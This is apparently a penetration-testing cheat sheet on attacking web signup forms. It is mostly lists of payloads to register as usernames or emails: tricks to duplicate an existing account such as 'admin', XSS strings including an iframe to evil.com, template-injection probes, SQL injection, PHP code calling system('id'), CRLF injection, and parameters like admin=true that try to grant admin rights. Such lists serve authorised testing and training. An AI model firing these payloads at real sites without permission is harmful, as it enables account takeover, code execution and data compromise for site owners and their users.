icon

Web Registration (Signup) Attack

Last modified: 2024-02-08

Registration mechanism might be vulnerable to compromise.

Register with the Same Username/Email Address as Existing User

We might be able to register the same username/email address as the existing user. It may affect the web server so be careful when testing.
Here are examples of username to register.

admin
administrator
root

Alternatively, it’s worth to try various approach to register.

# Insert null byte
admin\0
admin%00

# Insert a space before username
 admin
%20admin

# Insert a space after username
admin 
admin%20

# Insert spaces around username
 admin 
%20admin%20

# Replace uppercase/lowercase
Admin
aDmIn

# Overflow (we need to find the longest characters that can be registered)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxadmin

Register Malicious Username/Email Address

XSS

We might be able to inject XSS in username when registration.

john<script>alert(1)</script>
john</span><script>alert(1)</script>
john<iframe src=https://evil.com></iframe>

# Combine with overflow character length
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<script>alert(1)</script>

SSTI

It’s worth to try SSTI payloads if the website uses frameworks/template engines such as Flask Pug, Angular, etc. Register username with the following SSTI.

{{2*3}}
{2*3}
${2*3}
2*3

{{ `<script>alert(1)</script>` }}
{% debug %}

SQLi

If website queries the database items using username, we might be able to inject SQL command in the username. Register username with the following SQLi.

test' or 1=1--
test' or '1'='1'--

test' union select null,null--
test' union select null,null,null--

PHP Injection

john<?php echo system('id');?>
john<?php system('ping -c 1 10.0.0.1');?>

CRLF (%0d%0a)

Inserting CRLF code (%0d%0a) after the username or email, it may cause unexpected behavior.

username=john%0d%0a&password=mypassword123
email=attacker%40evil.com%0d%0a&password=mypassword123

Broken Access Control

We might be able to break the access restrictions on target page by adding specific params when registration.

username=test&password=test&admin=true
username=test&password=test&isAdmin=true
username=test&password=test&admin=1
username=test&password=test&usertype=1